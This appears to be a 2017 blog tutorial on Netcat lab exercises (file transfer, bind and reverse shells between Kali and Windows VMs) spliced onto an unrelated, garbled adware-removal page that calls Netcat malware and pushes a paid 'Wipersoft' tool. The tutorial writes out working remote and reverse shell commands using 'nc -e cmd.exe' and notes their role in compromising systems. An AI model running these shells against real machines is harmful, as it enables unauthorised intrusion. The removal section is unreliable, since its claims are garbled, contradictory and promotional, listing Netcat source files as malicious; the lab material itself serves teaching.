29 April 2017 / Netcat What is Netcat?Netcat is considered the Swiss-army knife in information security. Basically, it's a power version of the classic Telnet program, capable of numerous additional tasks like chatting, file transfer, port scanning, banner grabbing, opening remote shells to even setting up a honey pot. An important feature of Netcat is that it can serve both as a client and a server (more detail later).
In this blogpost, I'll practice some practical examples on the different usages of Netcat. I won't show you how to chat or do a port scan with Netcat because there are better tools available for these purposes. Good to know is that Netcat is available for both Linux and Windows. File transfer with NetcatNetcat is a great tool to send files over the network from one machine to another.
In my lab, I am running two virtual machines (Kali Linux and Windows 7) on Virtualbox. Both are connected via a network bridge, so they are part of my internal network Both machines have Netcat installed.On the Windows 7 machine, we created a simple text file that we want to send to the Kali Linux machine. The Windows 7 machine's IP adress is 192.168.0.249, Kali's IP adress is 182.168.0.114. Step 1: send the file from the Windows VM to the Kali VM nc 192.168.0.114 1234 zeroday.txt.
nc (run Netcat).lvp 1234 ( Listen Verbosely on Port 1234). zeroday.txt (output any data transferred to a file called zeroday.txt)In the left screenshot we cat the file and you see it's indeed our text file from our Windows VM.2.
Reverse shell and remote shell with NetcatGetting a reverse or remote shell is one of the key goal settings in offensive security. First it's important to understand the difference between a remote shell and a reverse shell.A remote shell (or bind shell), is when you are binding a shell to a local port on one machine, and another machine connects to that port to remotely use the shell.A reverse shell, is when you tell the shell to connect back to your machine which is listening for a connection ready for exploitation.Choosing which one to use is depending on the network. Let's see the scenario below ):Dennis has a computer connected to the internet but within a NAT network, whilst Sophie is directly connected to the internet.
Sophie's computer is directly accessible from the internet, but Dennis' system is not because it's behind a NAT.If Dennis needs a shell on Sophie's computer, he can use a remote shell. He simply tries to connect with Sophie's system via Netcat whilst Sophie starts listening for a connection. Once connected she can bind her shell to the connection. A remote shell is established and Dennis can execute commands via this shell.If Sophie wants a shell on Dennis' computer, she can not connect to his computer as his system is not publicly available.
To overcome this, Dennis would need to bind his shell from his side to the network via Netcat and connect to Sophie, whilst Sophie should start listening for incoming connections. Once connected, Sophie has access to Dennis shell and can execute commands as well.So basically, a Bind shell is you connecting from your machine to the shell, a reverse shell is the shell connecting to a listening service (Netcat) on your machine. Example 1: get a remote shell via NetcatLet's start simply by demonstrating how you can achieve a remote shell with Netcat from one machine to another. In this example, we are going to bind the shell on the Windows VM and connect to this shell via the Kali VM.Windows VM side: nc -lvp 1234 -e cmd.exe.
nc (run Netcat).lvp 1234 ( Listen Verbosely on Port 1234 (randomly chosen).e cmd.exe (binds cmd.exe to Netcat)Kali VM side: nc 192.168.0.249 1234. nc (run Netcat). 192.168.0.249 1234 (IP of the Windows VM + chosen port)Note: if you would like to bind a Linux shell instead of a Windows shell to Netcat, use /bin/bash instead of cmd.exe Example 2: get a reverse shell via NetcatNext, we'll try getting a reverse shell. Instead of the attacking machine connecting to the target machine like in the first example, we are now going to ininiate bind the shell on the target machine to Netcat initiate a connection to the attacking machine.
My Kali IP address in this exercise is 192.168.0.240Windows client: nc 192.168.0.240 1234 -e cmd.exeKali VM: ncat -lvp 1234Real life scenario'sIn offensive security, getting an reverse shell is a very big step in compromising a system. Unfortunately in real life scenario's, in most cases Netcat is not available and you have no immediate way to install or run Netcat. For any method to work, the attacker either needs to be able to execute arbitrary command on the system (your options are limited by the installed scripting languages on the target machine, such as Bash, Perl, Python, Powershell.) or should be able to upload a file that can be executed by opening from the browser, by example a reverse-shell-PHP-script.
Netcatnetctl.exeBadwareWin32 (Windows XP, Vista/7, 8/8.1, Windows 10)Google Chrome, Mozilla Firefox, Internet Explorer, SafariUsing of Netcat removal tools is a widely-used computer guard practice on the way to remove Netcat. Customary presence of Netcat is hideway from buyers, that's why it's stony to remove Netcat. Outspreading of Netcat is counted as a criminal act but that doesn't mean that you don't need to install Netcat removal tools because legal proceedings will save you.
Many users habitually ignore authorizations of software allowing Netcat installing on their computers. Netcat can be scanned by Netcat removal tools when performing Netcat removal stopping any trys of it to penetrate in the PC. 10) Like most anti malware many Netcat removal tools ask a oftentimes updated data storage of pests to let consumers performing of worthy Netcat removal.Netcat intrusion methodNetcat installs on your PC along with free software. This method is called 'bundled installation'. Freeware offers you to install additional module (Netcat).
Then if you fail to decline the offer it starts hidden installation. Netcat copies its file(s) to your hard disk. Its typical file name is netctl.exe. Sometimes it creates new startup key with name Netcat and value netctl.exe. You can also find it in your processes list with name netctl.exe or Netcat. Also, it can create folder with name Netcat under C:Program Files or C:ProgramData.
After installation Netcat starts displaying ads, pop-ups, banners on your PC or in browsers. It is recommended to remove Netcat immediately.Download Wipersoft AntispywareDownload this advanced removal tool and solve problems with Netcat and netctl.exe (download of fix will start immediately):. WiperSoft Antispyware was developed to remove threats like Netcat in automatic mode. Remover has active module to protect PC from hijackers, trojans, ransomware and other viruses. Trial version of Wipersoft provides detection of computer viruses for FREE.
To remove malware, you have to purchase the full version of Wipersoft. Threat's description and solution are developed by Security Stronghold security team.Here you can also learn:How to remove Netcat manuallyThis problem can be solved manually by deleting all registry keys and files connected with Netcat, removing it from starup list and unregistering all corresponding DLLs.
Additionally missing DLL's should be restored from distribution in case they are corrupted by Netcat.To get rid of Netcat, you should:1. Kill the following processes and delete the appropriate files:. doexec.c. doexec.obj.
generic.h. getopt.obj. gtvx.exe. hobbit.txt. makefile.dsp. makefile.ncb. makefile.opt.
nc.dsp. nc.exe. nc.ilk. nc.ncb.
nc.opt. nc23.exe. netcat.blu. netcat.c. netcat.dsp.
netcat.exe. netcat.mak. netcat.mdp. netcat.ncb. netcat.obj. netcat.opt. netcat.txt.
pskill.exe. vc50.idb. vc50.pch. tlist.exe.
netctl.exeWarning: you should delete only those files which checksums are listed as malicious. There may be valid files with the same names in your system. We recommend you to use for safe problem solution.Trial version of Wipersoft provides detection of computer viruses for FREE.
To remove malware, you have to purchase the full version of Wipersoft.2. Delete the following malicious folders:no information3.
Delete the following malicious registry entries andor values:no informationWarning: if value is listed for some registry entries, you should only clear these values and leave keys with such values untouched. We recommend you to use for safe problem solution.Uninstall Netcat related programs from Control PanelWe recommend you to check list of installed programs and search for Netcat entry or other unknown and suspicious programs.
Netcat Windows Tutorial
Below are instructions for different version if Windows. In some cases adware programs are protected by malicious service or process and it will not allow you to uninstall it.